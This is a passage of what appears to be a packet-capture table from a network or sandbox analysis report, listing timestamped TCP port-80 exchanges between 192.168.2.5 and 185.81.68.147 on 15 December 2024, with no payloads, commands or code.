                                                                                                                                                                                                                        Dec 15, 2024 09:12:07.859261990 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:07.859294891 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:07.859349966 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:07.859383106 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:07.859402895 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:07.859416008 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:07.859446049 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:07.859446049 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:07.859452963 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:07.859494925 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:07.859566927 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:07.859601974 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:07.859649897 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:07.979406118 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:07.979640007 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:07.979715109 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:07.983561039 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.036276102 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.050916910 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.051014900 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.051095009 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.055259943 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.055284023 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.055351973 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.063689947 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.066606998 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.066682100 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.066781044 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.075032949 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.075052023 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.075185061 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.083569050 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.083587885 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.083640099 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.091929913 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.091972113 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.092015982 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.100466013 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.100503922 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.100539923 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.108968973 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.109004974 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.109054089 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.117352009 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.117387056 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.117427111 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.125749111 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.125785112 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.125830889 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.156411886 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.156436920 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.156533003 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.170989990 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.171129942 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.243345022 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.243395090 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.243555069 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.245697975 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.245719910 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.245810986 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.250787973 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.250910044 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.250974894 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.255832911 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.255852938 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.255928993 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.260708094 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.260915041 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.260987997 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.265746117 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.265768051 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.265830040 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.270467997 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.270528078 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.270586967 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.275407076 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.275523901 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.275645971 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.280513048 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.280672073 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.280759096 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.285248041 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.285276890 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.285351992 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.290046930 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.290069103 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.290146112 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.294775009 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.295005083 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.295072079 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.299731016 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.299835920 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.299912930 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.305651903 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.305675983 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.305737972 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.308485031 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.308502913 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.308567047 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.312298059 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.312606096 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.312674046 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.316220999 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.316339016 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.316505909 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.320358992 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.320379972 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.320460081 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.324223995 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.324309111 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.324377060 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.435827017 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.435921907 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.435981989 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.437374115 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.437886000 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.437932014 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.438052893 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.440603018 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.440628052 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.440660954 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.443666935 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.443706989 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.443716049 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.446649075 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.446696043 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.446706057 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.449474096 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.449528933 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.449584007 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.452467918 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.452487946 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.452524900 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.455172062 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.455223083 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.455230951 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.458261013 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.458281040 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.458317041 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.460797071 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.460849047 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.460902929 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.463767052 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.463787079 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.463814020 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.466564894 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.466588020 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.466614008 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.469336987 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.469361067 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.469386101 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.472074986 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.472127914 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.472321033 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.475167990 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.475223064 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.475311041 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.477711916 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.477761030 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.478005886 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.480647087 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.480664015 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.480691910 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.483347893 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.483396053 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.483413935 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.486323118 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.486341953 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.486370087 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.489104033 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.489155054 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.489202976 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.491892099 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.491908073 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.491938114 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.494618893 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.494667053 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.494705915 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.497399092 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.497448921 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.497545958 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.500422001 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.500459909 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.500479937 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.503202915 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.503238916 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.503252983 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.505955935 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.506021976 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.506149054 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.508780956 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.508832932 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.508863926 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.511539936 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.511595964 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.511662006 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.514450073 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.514502048 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.514503002 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.517251968 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.517304897 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.517319918 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.520091057 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.520122051 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.520147085 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.567511082 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.627413988 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.627499104 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.627599955 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.628566980 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.628717899 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.628777981 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.631032944 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.631913900 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.631980896 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.632009983 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.634408951 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.634480953 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.634484053 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.636786938 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.636869907 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.636917114 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.639174938 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.639239073 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.639285088 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.641465902 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.641535044 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.641575098 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.643723965 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.643790007 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.643831968 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.646025896 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.646091938 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.646097898 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.648200989 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.648268938 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.648350954 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.650485039 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.650552988 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.650564909 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.652631998 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.652695894 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.652739048 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.654845953 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.654913902 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.654961109 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.657089949 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.657154083 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.657179117 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.659332037 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.659387112 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.659437895 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.661529064 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.661593914 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.661648035 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.663755894 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.663784027 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.663814068 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.665904045 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.665966988 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.666004896 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.668154955 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.668207884 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.668240070 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.670360088 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.670413971 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.670478106 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.672554016 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.672611952 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.672657013 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.674793005 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.674858093 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.674885035 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.676984072 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.677061081 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.677098989 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.679249048 CET8049707185.81.68.147192.168.2.5
